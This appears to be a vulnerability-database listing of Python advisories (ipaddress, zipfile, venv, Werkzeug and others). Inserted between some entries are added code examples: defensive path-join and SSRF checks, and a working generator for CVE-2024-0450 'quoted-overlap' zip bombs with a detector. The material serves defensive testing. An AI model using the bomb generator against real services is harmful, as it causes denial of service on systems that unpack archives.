222 matches found

Amazon
added 2025/02/25 12:00 a.m., 2 views

Low: python3

Issue Overview: The "ipaddress" module contained incorrect information about whether certain IPv4 and IPv6 addresses were designated as "globally reachable" or "private". This affected the is_private and is_global properties of the ipaddress.IPv4Address, ipaddress.IPv4Network, ipaddress.IPv6Address...

CVSS 7.5, AI score 6.9, EPSS 0.01127
Exploits 0
OSV
added 2025/02/20 5:54 p.m., 1 view

USN-7280-1 python3.10, python3.12, python3.8 vulnerability

It was discovered that Python incorrectly handled parsing domain names that included square brackets. A remote attacker could possibly use this issue to perform a Server-Side Request Forgery (SSRF) attack...

CVSS 6.3, AI score 6.8, EPSS 0.01639
Exploits 0, References 2
OSV
added 2025/01/23 6:15 p.m., 1 view

DEBIAN-CVE-2025-22153

RestrictedPython is a tool that helps define a subset of the Python language, allowing program input to be provided into a trusted environment. Via a type confusion bug in versions of the CPython interpreter starting in 3.11 and prior to 3.13.2 when using try/except, RestrictedPython starting...

CVSS 7.9, AI score 5.3, EPSS 0.00049
Exploits 0, References 1
OSV
added 2025/01/16 7:23 a.m., 8 views

BIT-PYTHON-MIN-2020-8492

Python 2.7 through 2.7.17, 3.5 through 3.5.9, 3.6 through 3.6.10, 3.7 through 3.7.6, and 3.8 through 3.8.1 allows an HTTP server to conduct Regular Expression Denial of Service (ReDoS) attacks against a client because of urllib.request.AbstractBasicAuthHandler catastrophic backtracking...

CVSS 7.1, AI score 6.7, EPSS 0.02954
Exploits 1, References 17
OSV
added 2025/01/16 7:21 a.m., 7 views

BIT-PYTHON-MIN-2023-40217

An issue was discovered in Python before 3.8.18, 3.9.x before 3.9.18, 3.10.x before 3.10.13, and 3.11.x before 3.11.5. It primarily affects servers such as HTTP servers that use TLS client authentication. If a TLS server-side socket is created, receives data into the socket buffer, and then is...

CVSS 5.3, AI score 6.4, EPSS 0.00581
Exploits 0, References 8
Positive Technologies
added 2024/12/06 12:00 a.m., 4 views

PT-2024-10121

Name of the Vulnerable Software and Affected Versions: Python versions 3.12.0 through 3.12.x; Python versions prior to 3.14.0a2. Description: The issue is related to the asyncio.SelectorSocketTransport.writelines method, which does not properly "pause" writing and signal to the Protocol to drain the...

CVSS 9.4, AI score 7, EPSS 0.01639
Exploits 14, References 95
Github Security Blog
added 2024/12/05 7:06 p.m., 14 views

Build corruption when using `PYO3_CONFIG_FILE` environment variable

In PyO3 0.23.0 the PYO3_CONFIG_FILE environment variable used to configure builds regressed such that changing the environment variable would no longer trigger PyO3 to reconfigure and recompile. In combination with workflows using tools such as maturin to build for multiple versions in a single...

AI score 7.1
Exploits 0, References 3, Affected Software 1
Positive Technologies
added 2024/10/25 12:00 a.m., 1 view

PT-2024-33676

Name of the Vulnerable Software and Affected Versions: Werkzeug versions prior to 3.0.6 Description: The issue arises from the os.path.isabs function not correctly handling UNC paths like //server/share on Python versions less than 3.11 on Windows. This affects Werkzeug's safe join function, whic...

CVSS 6.3, AI score 6.8, EPSS 0.01392
Exploits 0, References 17
CNNVD
added 2024/10/25 12:00 a.m., 1 view

Werkzeug path traversal vulnerability

Werkzeug is a comprehensive WSGI web application library open-sourced by Pallets. A path traversal vulnerability exists in Werkzeug versions prior to 3.0.6, which stems from the inability of os.path.isabs to catch UNC paths on Windows systems with Python versions less than 3.11, resulting in...

CVSS 6.3, AI score 6.5, EPSS 0.01392
Exploits 0, References 5
OSV
added 2024/10/22 5:15 p.m., 0 views
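The check both Werkzeug entries describe, written out as an added example rather than Werkzeug's own code: a safe_join for untrusted path segments that treats a segment as absolute if either the POSIX or the Windows rules would, so a //server/share path is refused even on an interpreter whose os.path.isabs misses UNC paths. The base directory and file names in the usage are made up for the demonstration.

```python
from __future__ import annotations

import ntpath
import posixpath
from typing import Optional


def is_absolute_on_any_platform(path: str) -> bool:
    """True if either path flavour would treat `path` as absolute.

    Consulting both flavours plus splitdrive() is what closes the gap described
    above: on Windows with Python < 3.11, ntpath.isabs() returned False for a UNC
    path such as //server/share, so a guard built on os.path.isabs() alone let
    it through.
    """
    return (
        posixpath.isabs(path)                 # leading "/" (also covers //server/share)
        or ntpath.isabs(path)                 # leading "\" or "X:\..."
        or ntpath.splitdrive(path)[0] != ""   # drive letter or UNC share prefix
    )


def safe_join(directory: str, *pathnames: str) -> Optional[str]:
    """Join untrusted segments under `directory`; None if any segment could escape
    (absolute path, drive or UNC prefix, backslash, or a leading '..')."""
    parts = [directory]
    for filename in pathnames:
        if filename != "":
            filename = posixpath.normpath(filename)   # collapse "a/../b" before checking
        if (
            "\\" in filename
            or is_absolute_on_any_platform(filename)
            or filename == ".."
            or filename.startswith("../")
        ):
            return None
        parts.append(filename)
    return posixpath.join(*parts)


if __name__ == "__main__":
    base = "/srv/static"   # constructed document root
    for candidate in ("css/app.css", "../etc/passwd", "//server/share/secret.txt", "C:/boot.ini"):
        print(f"{candidate!r:35} -> {safe_join(base, candidate)!r}")
```

A segment that normalises to something starting with "../" (for example "a/../../etc/passwd") is rejected on the same branch as a literal "..", which is why normpath runs before the checks rather than after them.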

AZL-50926 CVE-2024-9287 affecting package python3 for versions less than 3.12.9-1

A vulnerability has been found in the CPython venv module and CLI where path names provided when creating a virtual environment were not quoted properly, allowing the creator to inject commands into virtual environment "activation" scripts (i.e. "source venv/bin/activate"). This means that...

CVSS 7.8, AI score 6.7, EPSS 0.00061
Exploits 0, References 1
OSV
added 2024/09/03 1:15 p.m., 2 views

AZL-48585 CVE-2024-6232 affecting package python3 for versions less than 3.9.19-5

There is a MEDIUM severity vulnerability affecting CPython. Regular expressions that allowed excessive backtracking during tarfile.TarFile header parsing are vulnerable to ReDoS via specifically-crafted tar archives...

CVSS 7.5, AI score 6.8, EPSS 0.03014
Exploits 2, References 1
OpenVAS
added 2024/08/28 12:00 a.m., 51 views

Python Multiple Vulnerabilities (Aug 2024) - Windows

Python is prone to an infinite loop vulnerability leading to a denial of service (DoS). SPDX-FileCopyrightText: 2024 Greenbone AG. Some text descriptions might be excerpted from referenced sources and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only. CPE =...

CVSS 9.8, AI score 7.3, EPSS 0.03014
Exploits 3, References 21
vulnersOsv
added 2024/08/07 3:15 p.m., 1 view

11x-wagtail-blog (>=0.0.0 <=0.2.0), aldryn-django (>=5.0.2.0 <=5.0.11.0) +240 more potentially affected by CVE-2024-41990 via django (>=5.0.0 <=5.0.7)

django (PyPI) versions: =5.0.0, =0.0.0, =5.0.2.0, =0.0.15, =1.14.3, =0.0.20, =0.0.13, =0.0.19, =0.0.34, =0.0.50, =0.0.5, =0.0.11, =1.0.3, =0.1.0, =0.2.5 and more. Source CVEs: CVE-2024-41990. Source advisory: OSV:PYSEC-2024-68...

CVSS 7.5, AI score 6.7, EPSS 0.01326
Exploits 0
OSV
added 2024/08/01 2:15 p.m., 0 views

AZL-47346 CVE-2024-6923 affecting package python3 for versions less than 3.9.19-8

There is a MEDIUM severity vulnerability affecting CPython. The email module didn’t properly quote newlines for email headers when serializing an email message allowing for header injection when an email is serialized...

CVSS 5.5, AI score 6.8, EPSS 0.00238
Exploits 0, References 1
OSV
added 2024/06/27 9:15 p.m., 2 views

DEBIAN-CVE-2024-5642

CPython 3.9 and earlier doesn't disallow configuring an empty list ("[]") for SSLContext.set_npn_protocols(), which is an invalid value for the underlying OpenSSL API. This results in a buffer over-read when NPN is used (see CVE-2024-5535 for OpenSSL). This vulnerability is of low severity due to NPN being...

CVSS 6.5, AI score 6.3, EPSS 0.00187
Exploits 1, References 1
OSV
added 2024/06/27 9:15 p.m., 0 views

UBUNTU-CVE-2024-5642

CPython 3.9 and earlier doesn't disallow configuring an empty list ("[]") for SSLContext.set_npn_protocols(), which is an invalid value for the underlying OpenSSL API. This results in a buffer over-read when NPN is used (see CVE-2024-5535 for OpenSSL). This vulnerability is of low severity due to NPN being...

CVSS 6.5, AI score 7, EPSS 0.06873
Exploits 1, References 6
OSV
added 2024/06/17 3:15 p.m., 0 views

UBUNTU-CVE-2024-4032

The “ipaddress” module contained incorrect information about whether certain IPv4 and IPv6 addresses were designated as “globally reachable” or “private”. This affected the is_private and is_global properties of the ipaddress.IPv4Address, ipaddress.IPv4Network, ipaddress.IPv6Address, and...

CVSS 7.5, AI score 6.7, EPSS 0.01127
Exploits 0, References 12
Amazon
added 2024/04/18 12:00 a.m., 5 views
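An added example of the defensive pattern this bug undermines, not code from the page, CPython or either distribution advisory: an SSRF-style egress check that still uses is_private and is_global but carries its own allow and deny lists for the ranges the fix's changelog says the stdlib got wrong (192.0.0.0/24 except 192.0.0.9 and 192.0.0.10, 64:ff9b:1::/48 and 2002::/16), so the verdict is the same on a patched or unpatched interpreter. The addresses in the usage are constructed; interpreter_is_patched() reports which behaviour the running interpreter has rather than assuming a version number.

```python
from __future__ import annotations

import ipaddress
from ipaddress import ip_address, ip_network

# Special-purpose ranges whose is_private / is_global answers were wrong before
# the CVE-2024-4032 fix (taken from that fix's changelog).  Spelled out here so
# the policy below does not depend on the interpreter's patch level.
EXPLICIT_ALLOW = [
    ip_network("192.0.0.9/32"),    # PCP anycast, globally reachable
    ip_network("192.0.0.10/32"),   # TURN anycast, globally reachable
]
EXPLICIT_DENY = [
    ip_network("192.0.0.0/24"),    # IETF protocol assignments; the old module only knew /29
    ip_network("64:ff9b:1::/48"),  # local-use IPv4/IPv6 translation
    ip_network("2002::/16"),       # 6to4, not globally reachable per the registry
]


def stdlib_verdict(addr: str) -> tuple[bool, bool]:
    """(is_private, is_global) exactly as this interpreter's ipaddress reports them."""
    ip = ip_address(addr)
    return ip.is_private, ip.is_global


def interpreter_is_patched() -> bool:
    """True when this interpreter carries the fix: 192.0.0.128 lies in the part of
    192.0.0.0/24 that the unpatched module wrongly reported as global."""
    return stdlib_verdict("192.0.0.128") == (True, False)


def egress_allowed(addr: str) -> bool:
    """Decide whether an outbound request may target `addr`.

    The stdlib flags do most of the work; the explicit lists override them for
    the ranges the stdlib has mis-classified, and IPv4-mapped IPv6 is unwrapped
    so that ::ffff:10.0.0.1 is judged as 10.0.0.1.
    """
    ip = ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        return egress_allowed(str(ip.ipv4_mapped))
    if any(ip in net for net in EXPLICIT_ALLOW):
        return True
    if any(ip in net for net in EXPLICIT_DENY):
        return False
    if (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified):
        return False
    return ip.is_global


if __name__ == "__main__":
    print("patched ipaddress:", interpreter_is_patched())
    for a in ("8.8.8.8", "10.0.0.1", "169.254.169.254", "192.0.0.128", "::ffff:127.0.0.1", "2002:c000:204::"):
        print(f"{a:>20}  stdlib={stdlib_verdict(a)}  egress_allowed={egress_allowed(a)}")
```

Resolve the hostname yourself and run every returned address through egress_allowed before connecting; the check is worthless if the HTTP client resolves the name a second time behind your back.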

Medium: python3

Issue Overview: An issue was found in the CPython zipfile module affecting versions 3.12.2, 3.11.8, 3.10.13, 3.9.18, and 3.8.18 and prior. The zipfile module is vulnerable to "quoted-overlap" zip-bombs which exploit the zip format to create a zip-bomb with a high compression ratio. The fixed...

CVSS 6.2, AI score 6.8, EPSS 0.00153
Exploits 0
OSV
added 2024/03/19 4:15 p.m., 0 views

AZL-36894 CVE-2024-0450 affecting package python3 for versions less than 3.9.19-1

An issue was found in the CPython zipfile module affecting versions 3.12.1, 3.11.7, 3.10.13, 3.9.18, and 3.8.18 and prior. The zipfile module is vulnerable to “quoted-overlap” zip-bombs which exploit the zip format to create a zip-bomb with a high compression ratio. The fixed versions of CPython...

CVSS 6.2, AI score 6.7, EPSS 0.00153
Exploits 0, References 1
OSV
added 2024/03/19 4:15 p.m., 2 views

ALPINE-CVE-2024-0450

An issue was found in the CPython zipfile module affecting versions 3.12.1, 3.11.7, 3.10.13, 3.9.18, and 3.8.18 and prior. The zipfile module is vulnerable to “quoted-overlap” zip-bombs which exploit the zip format to create a zip-bomb with a high compression ratio. The fixed versions of CPython...

CVSS 6.2, AI score 6.7, EPSS 0.00153
Exploits 0, References 1
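The three CVE-2024-0450 entries name the "quoted-overlap" construction without showing it. The added example below (not CPython's code, and built only for this page) writes such an archive by hand: each member's DEFLATE stream opens with a stored block that quotes the next member's local header, so every member shares one compressed kernel while keeping its own consistent name and CRC. It then finds the overlap from the central directory alone, which works on any interpreter, and reports how the running interpreter's zipfile reacts (a fixed one raises BadZipFile, an unfixed one hands out the full claimed size). Member names, the kernel and the timestamp are all constructed; zip64 is not handled.

```python
from __future__ import annotations

import io
import struct
import zipfile
import zlib

# Record layouts from APPNOTE.TXT (little-endian); zip64 is out of scope here.
LOCAL_HEADER = struct.Struct("<4s5H3L2H")      # 30 bytes + name + extra
CENTRAL_DIR = struct.Struct("<4s4B4HL2L5H2L")  # 46 bytes + name + extra + comment
EOCD = struct.Struct("<4s4H2LH")               # 22 bytes + comment
DOS_DATE = ((2024 - 1980) << 9) | (1 << 5) | 1 # 2024-01-01, a constructed timestamp


def central_directory(data: bytes) -> list[tuple[str, int, int, int]]:
    """(name, header_offset, compress_size, file_size) for each central-directory entry."""
    eocd_off = data.rfind(b"PK\x05\x06")
    if eocd_off < 0:
        raise zipfile.BadZipFile("no end-of-central-directory record")
    _, _, _, _, total, _, cd_off, _ = EOCD.unpack_from(data, eocd_off)
    entries, pos = [], cd_off
    for _ in range(total):
        f = CENTRAL_DIR.unpack_from(data, pos)
        if f[0] != b"PK\x01\x02":
            raise zipfile.BadZipFile("bad central-directory entry")
        name = data[pos + 46:pos + 46 + f[12]].decode()
        entries.append((name, f[18], f[10], f[11]))
        pos += 46 + f[12] + f[13] + f[14]
    return entries


def entry_span(data: bytes, header_offset: int, compress_size: int) -> tuple[int, int]:
    """Byte range [start, end) of a member's local header plus its compressed data."""
    f = LOCAL_HEADER.unpack_from(data, header_offset)
    if f[0] != b"PK\x03\x04":
        raise zipfile.BadZipFile("bad local file header")
    return header_offset, header_offset + 30 + f[9] + f[10] + compress_size


def find_overlaps(data: bytes) -> list[tuple[str, str]]:
    """Member pairs whose byte ranges overlap: the signature of a quoted-overlap bomb."""
    spans = sorted((entry_span(data, off, cs), name) for name, off, cs, _ in central_directory(data))
    return [(a, b) for ((_, a_end), a), ((b_start, _), b) in zip(spans, spans[1:]) if b_start < a_end]


def claimed_size(data: bytes) -> int:
    """Uncompressed total the central directory promises, whatever the bytes really hold."""
    return sum(size for _, _, _, size in central_directory(data))


def stored_block(payload: bytes) -> bytes:
    """One non-final DEFLATE stored block (BFINAL=0, BTYPE=00) quoting `payload` verbatim."""
    return b"\x00" + struct.pack("<HH", len(payload), len(payload) ^ 0xFFFF) + payload


def make_overlap_zip(kernel_plain: bytes, copies: int) -> bytes:
    """Quoted-overlap archive: member i's stream = stored_block(LFH of member i+1) + member
    i+1's stream, so local headers sit 40 bytes apart and all streams end in one kernel."""
    raw = zlib.compressobj(9, zlib.DEFLATED, -15)          # raw DEFLATE, no zlib wrapper
    kernel = raw.compress(kernel_plain) + raw.flush()
    comp, plain, records, headers = kernel, kernel_plain, [], []
    for i in reversed(range(copies)):                        # build from the last member back
        if headers:
            comp, plain = stored_block(headers[0]) + comp, headers[0] + plain
        name, crc = f"f{i:04d}".encode(), zlib.crc32(plain)
        records.insert(0, (name, crc, len(comp), len(plain)))
        headers.insert(0, LOCAL_HEADER.pack(b"PK\x03\x04", 20, 0, 8, 0, DOS_DATE,
                                            crc, len(comp), len(plain), 5, 0) + name)
    body = headers[0] + comp                                 # member 0's stream embeds the rest
    cd = b"".join(CENTRAL_DIR.pack(b"PK\x01\x02", 20, 3, 20, 0, 0, 8, 0, DOS_DATE, crc, cs, us,
                                   5, 0, 0, 0, 0, 0, 40 * i) + name
                  for i, (name, crc, cs, us) in enumerate(records))
    return body + cd + EOCD.pack(b"PK\x05\x06", 0, 0, copies, copies, len(cd), len(body), 0)


def make_clean_zip(payload: bytes) -> bytes:
    """Ordinary one-member archive, for comparison."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("f0000", payload)
    return buf.getvalue()


def stdlib_reaction(data: bytes) -> str:
    """'rejected' if this interpreter's zipfile refuses the overlapped members (the
    CVE-2024-0450 fix), else 'expanded:<bytes>' for what an unfixed one hands out."""
    total = 0
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                with zf.open(info) as fh:
                    total += len(fh.read())
    except zipfile.BadZipFile:
        return "rejected"
    return f"expanded:{total}"


if __name__ == "__main__":
    bomb = make_overlap_zip(b"A" * 100_000, 100)
    print(len(bomb), "bytes on disk,", claimed_size(bomb), "bytes claimed,",
          len(find_overlaps(bomb)), "overlapping pairs,", stdlib_reaction(bomb))
```

find_overlaps only needs the central directory and the 30-byte local headers, so it can run on an upload before anything is inflated, and a ratio check on claimed_size against len(data) catches the classic non-overlapping bombs that this one does not flag.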